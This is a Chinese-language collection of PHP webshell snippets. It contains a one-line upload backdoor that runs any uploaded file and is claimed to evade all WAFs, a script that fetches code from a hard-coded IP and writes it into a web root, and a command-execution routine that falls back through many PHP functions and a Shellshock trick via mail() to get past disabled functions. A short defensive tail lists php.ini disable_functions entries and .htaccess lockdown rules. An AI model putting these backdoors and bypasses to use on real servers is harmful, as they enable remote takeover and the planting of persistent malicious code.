文件上传表单后门,比较不错通杀所有waf
@INCLUDE_ONCE($_FILES['only_pcd']['tmp_name']);
?>
保存之后
本地构建一个上传表单
你传什么
他就执行什么
php下载远程文件写入服务器
function Reads($url){
if (in_array('curl', get_loaded_extensions())) {
$handle = curl_init();
curl_setopt_array($handle, array(
CURLOPT_USERAGENT => USER_AGENT,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => false,
CURLOPT_HTTPGET => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 30,
CURLOPT_URL => $url
));
$html = curl_exec($handle);
curl_close($handle);
return $html;
}
$opts = array('http' => array('method' => "GET",'timeout' => 8));
$context = stream_context_create($opts);
$html = file_get_contents($url, false, $context);
if(empty($html)){
$html = file_get_contents($url, false, $context);
}
return $html;
}
$c=Reads('http://11.11.222.111/cc.txt');
$fp = @fopen('D:/wwwroot/xxx.com/xxx/link.php',"w");
fwrite($fp,$c);
fclose($fp);
?>
php命令执行脚本代码,多个安全函数执行
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\r\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
return $res;
}
echo Exec_Run('whoami');
php.ini 安全函数禁用
disable_functions =exec,passthru,popen,proc_open,shell_exec,system,assert,chroot,getcwd,scandir
Disabled functions: COM,opendir,get_cfg_var,eval,phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,dll,popen,disk_free_space,checkdnsrr,checkdnsrr,getservbyname,getservbyport,disk_total_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname,getcwd,assert
少点 的『禁用后什么都执行不了,管理员根据需求可以进行修改』
mail,eval,assert,phpinfo,passthru,exec,system,shell_exec,proc_open,popen,dl,pcntl_exec,putenv,touch,chble_functionsown,chmod,chroot,get_cfg_var,ini_alter,ini_restore,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,socket_create,unlink,chown,touch,ini_set,opendir,readdir,scandir,dir,pipe,win_shell_execute,win32_create_service
禁止当前目录执行脚本
.htaccess
Order allow,deny
Deny from all
.htaccess 如果不能执行PHP就在这里面加
AddType text/html .shtml
AddHandler server-parsed .shtml
DirectoryIndex index.shtml index.html index.htm index.php
Options +IncludesNoExec -ExecCGI